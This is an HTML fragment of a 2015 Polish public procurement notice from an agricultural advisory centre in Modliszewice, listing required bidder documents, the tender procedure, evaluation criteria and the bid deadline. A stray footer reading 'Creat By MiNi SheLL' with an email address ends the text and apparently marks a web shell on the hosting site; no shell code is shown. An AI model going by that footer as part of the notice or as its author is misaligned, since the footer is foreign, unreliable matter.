<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Okres gwarancji - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http//www.sodr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyski Ośrodek Doradztwa Rolniczego w Modliszewicach ul. Piotrkowska 30 26-200 Końskie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.11.2015 godzina 08:00, miejsce: Świętokrzyski Ośrodek Doradztwa Rolniczego w Modliszewicach ul. Piotrkowska 30 26-200 Końskie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com